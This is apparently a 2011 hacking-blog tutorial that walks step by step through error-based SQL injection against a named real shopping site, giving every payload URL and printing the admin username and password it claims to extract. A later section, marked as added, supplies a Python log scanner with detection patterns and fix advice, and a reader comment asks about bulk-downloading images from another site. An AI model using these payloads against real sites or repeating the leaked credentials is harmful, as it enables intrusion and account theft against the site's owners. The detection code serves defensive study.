Hack ASPX Websites With SQL Injections

Sunday, July 3, 2011 // by Hacking Beast Editor

Vulnerable link:



Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton
Step 1:


Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--
The above query gives a "Page not Found" error, so we use the following link for the rest of the queries:



Code:
http://pothys.com/ImageDisplay.aspx?Id=1535
Step 2: Finding the column names


Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1


The selected text represents the column names.

Step 3: Finding the table names

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))


Here the highlighted text is the first table in the database. But we are interested in finding the admin table, so let's try to find the next table in the database.

So the next query is:



Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))



So the name of the admin table is "AdminMaster"

Step 4: To find the columns in "AdminMaster" table


Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))

Column names: "Admin_name" and "Admin_password"





Step 5: Finding the username and password


Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))




Username: admin
Password: pothys!@#
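
Every request in the steps above puts SQL text into a parameter that should hold only an integer, so the whole sequence stands out in web-server logs. The following is an added example, not part of the original post, that flags those request shapes in constructed W3C-style log lines; the field order, client addresses, status codes and the rule that Id is integer-only are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Request shapes from the steps above, matched against the decoded query string.
PROBES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("HAVING error probe", re.compile(r"\bhaving\s+\d+\s*=\s*\d+", re.I)),
    ("CONVERT error extraction",
     re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I)),
    ("schema enumeration",
     re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I)),
]
NUMERIC_PARAMS = {"id"}  # assumption: Id only ever carries an integer

# Constructed sample log (addresses and status codes are made up).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-07-03 10:00:01 198.51.100.7 GET /ImageDisplay.aspx Id=1535&Prod=SilkCotton 200
2011-07-03 10:00:09 203.0.113.5 GET /ImageDisplay.aspx Id=1535+order+by+1-- 404
2011-07-03 10:00:15 203.0.113.5 GET /ImageDisplay.aspx Id=1535%20having%201=1 500
2011-07-03 10:00:31 203.0.113.5 GET /ImageDisplay.aspx Id=1535+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 500
"""


def classify(query):
    """Return sorted finding names for one raw (still URL-encoded) query string."""
    decoded = unquote_plus(query)
    findings = {name for name, rx in PROBES if rx.search(decoded)}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.add("non-numeric value in numeric parameter")
    return sorted(findings)


def scan(log_text):
    """Map client IP -> findings; several findings from one client suggest enumeration."""
    by_client = {}
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # header or malformed line
        hits = classify(fields[5])  # fields[5] is cs-uri-query
        if hits:
            by_client.setdefault(fields[2], set()).update(hits)  # fields[2] is c-ip
    return by_client


if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, sorted(hits))
```

Log matching only surfaces the activity. The fix belongs in the page code: parse Id as an integer, pass it to the database as a query parameter, and return a generic error page instead of the database error text.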

3 comments:

  • Hi there, I need to copy all the pictures displayed on the website with minimal effort. Let me explain what I mean.

    For instance, I am accessing this link:
    http://raagalahari.com/localevents/3560/kismet-pub-hyd-apr-7-2012.aspx
    As you can see, there are 50 images on this page. Now what I need to do is get all 50 images in their original resolution. Let me show you: http://raagalahari.com/localevents/3560/kismet-pub-hyd-apr-7-2012/image9.aspx

    Now this shows only one image. It's difficult for me to click on the thumbnail of each and every picture to save all of them to my local drive. Now what I really need is, when I go to the source of the page, I was able to see where the file is actually located. The location is <img src="http://img.raagalahari.com/april2012/pubs/kismet-april-7-2012/kismet-april-7-20128t.jpg"

    What I really need is access to <img src="http://img.raagalahari.com/april2012/pubs/kismet-april-7-2012/
    so that I can save all of them in 1 shot. How can I save all of them with minimal effort? Please help me out. Thanks.
